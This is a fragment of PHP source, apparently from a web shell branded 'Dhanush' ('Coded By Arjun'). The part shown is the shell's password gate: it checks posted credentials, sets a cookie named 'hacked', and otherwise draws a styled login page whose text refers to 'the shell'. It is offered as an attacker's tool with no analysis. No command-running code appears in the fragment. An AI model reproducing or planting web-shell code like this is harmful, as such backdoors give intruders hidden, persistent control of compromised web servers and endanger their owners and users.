6187<hr color="#1B1B1B">
6188<div align="center">
6189<font size="6" face="Times New Roman, Times, serif" color="#00CC00">धनुष<br>
6190--==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font color="#FF0000" size="6">जय हिन्द</font></a></div>
6191<?php
6192}
6193}
6194
6195if(isset($_POST['uname']) && isset($_POST['passwd']))
6196{
6197 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
6198 {
6199 setcookie("hacked", md5($pass));
6200 $selfenter = $_SERVER["PHP_SELF"];
6201 header("Location:$selfenter");
6202 }
6203}
6204
6205if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
6206{
6207 shellstyle();
6208?>
6209 <center>
6210 <form method="POST">
6211 <div style="background-color:#171717; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
6212 <table cellpadding="9" cellspacing="4">
6213 <tr>
6214 <td align="center" colspan="2"><blink><font size="7"><b>Dhanush</b></font></blink></td>
6215 </tr>
6216 <tr>
6217 <td align="right"><b>User Name : </b></td>
6218 <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6219 </tr>
6220 <tr>
6221 <td align="right"><b>Password : </b></td>
6222 <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6223 </tr>
6224 <tr>
6225 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
6226 </tr>
6227 <tr>
6228 <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
6229 </tr>
6230 <tr>
6231 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
6232 </tr>
6233 </table>
6234 </div>
6235
6236 </form>
6237 </center>
6238<br>
6239</body>
6240</html>
6241<?php
6242}
6243?>